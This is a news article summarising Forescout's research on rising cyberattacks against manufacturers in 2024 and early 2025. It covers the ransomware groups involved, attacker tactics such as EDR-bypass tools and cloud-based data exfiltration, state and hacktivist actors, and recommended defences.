New research from Forescout Technologies disclosed that in 2024, there was a 71 percent increase in threat actors targeting the manufacturing sector. Between 2024 and the first quarter of 2025, there were 29 active threat actors in manufacturing, with 79 percent of those being cybercriminals, and 45 percent were ransomware gangs. Of these, the most active was RansomHub with 78 victims, including large data thefts.
Forescout’s analysis of the manufacturing threat landscape in 2024 and the first quarter of 2025 revealed several significant trends. One of the most notable findings was an increase in attacker dwell time, indicating that threat actors are maintaining access within compromised environments for longer periods before detection. There was also a rise in the use of legitimate cloud services to facilitate data exfiltration, allowing attackers to blend in with normal network traffic and evade security controls.
Custom tools played a growing role in attacks. Examples include Black Basta’s BRUTED malware and RansomHub’s Betruger backdoor, both of which were used alongside living-off-the-land techniques to minimize detection. Additionally, the analysis found that hacktivist groups increasingly adopted ransomware tactics, while state-sponsored actors intensified their focus on operational technology within the manufacturing sector.
The latest research follows Forescout’s 2024 Threat Roundup, which ranked manufacturing as the fourth most targeted critical infrastructure sector. The ranking was driven by a 71 percent surge in active threat actors compared to the previous year. This sharp increase prompted a deeper investigation into the sector’s cyber risk profile.
The report examines the evolving threat landscape in manufacturing and offers a forward-looking assessment of emerging risks. As technologies like digital twins, industrial IoT, 5G, and AI (artificial intelligence) become more integrated into operations, they introduce new security challenges and widen existing detection gaps. To address these issues, the report outlines key strategies for reducing cyber risk across a highly interconnected and complex industrial environment.
The San Jose, California-headquartered vendor analyzed 17 cyber incidents to identify common tactics, techniques, and procedures used by threat actors. There was increased reliance on Initial Access Brokers, who sell access to compromised networks. Threat actors frequently exploit vulnerabilities in specific types of applications, including virtual private networks, remote access solutions, and file transfer applications.
Data exfiltration emerged as the most consistent and damaging impact. Stolen data included intellectual property, along with sensitive personal information such as Social Security numbers, bank account details, and passport scans belonging to employees and customers. Across the analyzed incidents, more than 3.3 terabytes of data were stolen. RansomHub was linked to the two largest exfiltration events, involving 2 terabytes and 487 gigabytes of stolen data, respectively.
The investigation highlighted several key trends in attacker behavior during the period. For initial access, threat actors increasingly relied on Initial Access Brokers and exploited vulnerabilities in widely used applications, including VPNs, remote access tools, and file transfer platforms.
In terms of persistence, execution, and command and control, there was a marked rise in the abuse of legitimate remote monitoring and management (RMM) tools. These tools were often used to launch commands through built-in functionality, such as shell access. Additional methods like user account creation, scheduled tasks, and web shells also remained common. While the use of Cobalt Strike has declined slightly for post-exploitation activities, it continues to appear in cases involving credential dumping and access token manipulation.
For defense evasion, a clear shift has occurred from traditional obfuscation techniques to the deployment of endpoint detection and response (EDR) bypass tools. KillAV, TrueSightKiller, and EDR Kill Shifter were among the tools used to disable endpoint telemetry. Techniques such as bring-your-own-vulnerable-driver (BYOVD) have become standard, replacing older methods like event log purging.
Threat actors have also adapted their discovery techniques. Many now favor Active Directory Service Interfaces (ADSI), as detection capabilities have improved against PowerShell-based reconnaissance tools. Finally, data exfiltration has become a routine step in most ransomware operations. Several groups showed a preference for specific tools, such as Rclone and MEGA, to facilitate data theft.
Legitimate remote monitoring and management tools were also used to maintain persistence and execute malicious activity within compromised environments. Additionally, there was a noticeable shift away from malware obfuscators in favor of tools designed to bypass endpoint detection and response systems. Finally, the use of custom malware was often combined with living-off-the-land techniques, where attackers leverage legitimate system tools to avoid detection and maintain a low profile.
Data revealed 121 threat actors with a history of targeting the manufacturing sector. Between 2024 and the first quarter of 2025, 29 of these actors were actively observed. The majority were cybercriminal groups, particularly those operating under the Ransomware-as-a-Service (RaaS) model.
RansomHub led the pack, claiming responsibility for attacks on 78 manufacturing organizations worldwide in 2024. The group was also behind several major data thefts within the sector. Other highly active RaaS groups included Akira, LockBit, Play, and Clop.
Despite high-profile law enforcement actions such as Operation Cronos, which targeted several major ransomware groups, many continued operating under the same name or through rebranded offshoots. Code reuse and affiliate crossover have contributed to a fragmented but persistent RaaS ecosystem, with some new groups emerging from defunct operations.
Several other groups showed some activity in manufacturing, although at lower levels. These include Fog, Medusa, Qilin, BlackSuit, 8Base, Hunters International, Black Basta, Snake/EKANS, INC Ransom, BianLian, Metaencryptor, Sarcoma, Space Bears, Everest, Ghost (Cring), Dragonforce, Frag, and Lynx.
Forescout noted that a consistent trend across these hackers is the deployment of multi-platform ransomware, now commonly used to target Windows, Linux, and ESXi environments.
Apart from cybercriminal groups, other types of actors also targeted the manufacturing sector. Hacktivist groups such as Handala, Kill Security, CyberVolk, and Cyber Army of Russia Reborn carried out ransomware attacks and disruptive operations against operational technology systems within manufacturing organizations. Their activities often reflected alignment with ongoing geopolitical conflicts.
State-sponsored threat groups were also active. APT28 and Volt Typhoon focused on targeting operational technology and industrial control system environments, including those connected to manufacturing. Another state-backed actor, Emperor Dragonfly, was observed deploying RA World ransomware following earlier espionage-related campaigns, suggesting a blending of strategic intelligence gathering with financially or operationally motivated attacks.
Researchers expect these three trends to continue shaping the cyber threat landscape soon. The volume of attacks is projected to remain high, driven by the ongoing evolution and expansion of the Ransomware-as-a-Service (RaaS) ecosystem. As more threat actors gain access to turnkey ransomware kits and affiliate networks, the barrier to launching attacks continues to drop, sustaining a high frequency of incidents.
Targeting of OT (operational technology) assets is also expected to increase. As attackers become more familiar with the architecture and vulnerabilities of OT environments, these systems will become more frequent and deliberate targets, especially in industries where disruption can yield significant impact.
Geopolitical influence is anticipated to play a larger role in shaping attacker behavior. Both state-sponsored groups and hacktivist collectives are likely to adopt ransomware-style tactics not for financial gain, but to cause disruption. These politically motivated operations may increasingly focus on critical manufacturing sub-sectors tied to national infrastructure or strategic supply chains.
Furthermore, as more organizations adopt cloud technologies, Forescout anticipates a rise in attacks that exploit cloud misconfigurations. Adding to these risks, the adoption of other emerging technologies within the sector is expected to introduce new and complex security challenges.
The researchers noted that manufacturing organizations need a proactive, adaptable security strategy to counter evolving threats. They must start with a full asset inventory, including risk levels and vulnerabilities, to guide patching, especially for exposed systems like VPNs and RDP, and enforce strong passwords and multi-factor authentication. Improve visibility by enabling logging across assets and using SIEM and detection tools to catch living-off-the-land techniques and anomalies.
Additionally, manufacturers must segment IT and OT networks and monitor traffic at the boundary for suspicious activity. Reduce supply chain risk by setting security standards for vendors and monitoring for third-party breaches. They must also maintain immutable, offline backups and test recovery regularly to limit ransomware impact. Use targeted threat intelligence to build OT-specific threat models and response playbooks. Before deploying new technologies, assess risks, apply vendor security requirements, and monitor for novel attack vectors.
